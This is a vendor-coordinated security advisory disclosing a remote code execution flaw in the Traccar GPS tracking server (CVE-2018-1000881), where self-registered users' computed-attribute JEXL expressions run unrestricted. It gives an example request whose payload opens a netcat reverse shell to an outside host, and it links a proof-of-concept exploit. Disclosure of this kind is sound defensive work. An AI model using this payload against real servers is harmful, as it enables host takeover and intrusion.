Our security team discovered a Remote Code Execution (RCE) vulnerability in the GPS vehicle tracking system Traccar (version <= 4.0).  This allows an attacker to compromise the server’s host via a self-registered user account.

If you use Traccar server, please update to >= v4.1 as soon as possible.

Vulnerability Identification

• AppCheck ID: AC-2018-10-8-1
• CVE: CVE-2018-1000881

Traccar

Traccar is a widely deployed Open Source GPS tracking system which supports over one thousand different devices/protocols.  The source tracking data is collected from devices by the server and is used to provide useful organisational services via a web portal, such as for logistics and efficient transportation worldwide.

Timeline

• Discovered: 8th October 2018
• Reported to Vendor: 11th October 2018
• Fixed/Mitigated: 12th October 2018 (diff1, diff2) (kudos to Anton Tananaev for his fast response to this)
• Fix Released (v 4.1): 20th October 2018 (release article)
• Advisory Published: 4th December 2018

Vulnerability Details

A feature of the application allows a self-registered user to create expressions which effectively normalise the output of their tracking devices in order to improve integration with the application.

Examples are such as synthesising the engine state of vehicles where that data is lacking from the particular device by inferring it from the device’s battery charge state.

These expressions are interpreted by the third-party JexlEngine without adequate restriction from the Java Virtual Machine (JVM).  As such, a crafted JEXL script can allow an attacker to compromise the server.

Example Crafted Request

POST /traccar/api/attributes/computed/test?deviceId=1 HTTP/1.1
Host: foo.host.com
X-Requested-With: XMLHttpRequest
Content-Type: application/json
Cookie: JSESSIONID=...; ext-devices-...

{"id":-1,"description":"test","type":"string","attribute":"raw",
"expression":"''.class.class.forName('java.lang.Runtime')
.getRuntime().exec('nc -nv 1.2.3.4 443 -e /bin/bash')"}

Vulnerable Code

// src/org/traccar/processing/ComputedAttributesHandler.java
package org.traccar.processing;
...
import org.traccar.model.Position;

@ChannelHandler.Sharable
public class ComputedAttributesHandler extends BaseDataHandler {

    public ComputedAttributesHandler() {
        engine = new JexlEngine();
        engine.setStrict(true);
        ...
    }

    private MapContext prepareContext(Position position) {
        MapContext result = new MapContext();
        ...
        return result;
    }

    public Object computeAttribute(Attribute attribute, Position position) throws JexlException {
        return engine.createExpression(attribute.getExpression()).evaluate(prepareContext(position));
    }
    ...
}

PoC Exploitation

A proof-of-concept tool (traccar_exploit.v1.py) was was written to exploit this vulnerability and is demonstrated in this video

References

• https://www.traccar.org/
• https://www.traccar.org/documentation/computed-attributes/
• http://commons.apache.org/proper/commons-jexl/
• https://www.traccar.org/blog/traccar-4-1/
• https://github.com/traccar/traccar/commit/a1397ca05d9000b914b249b78997f7f3ebb14319
• https://github.com/traccar/traccar-web/commit/d15fa5e2316b62884e48830c6c0bacb54ed1cd52
• https://www.youtube.com/watch?v=EpqnwS3H55M
• http://appcheck-ng.com/wp-content/uploads/2018/12/traccar_exploit.v1.py_.txt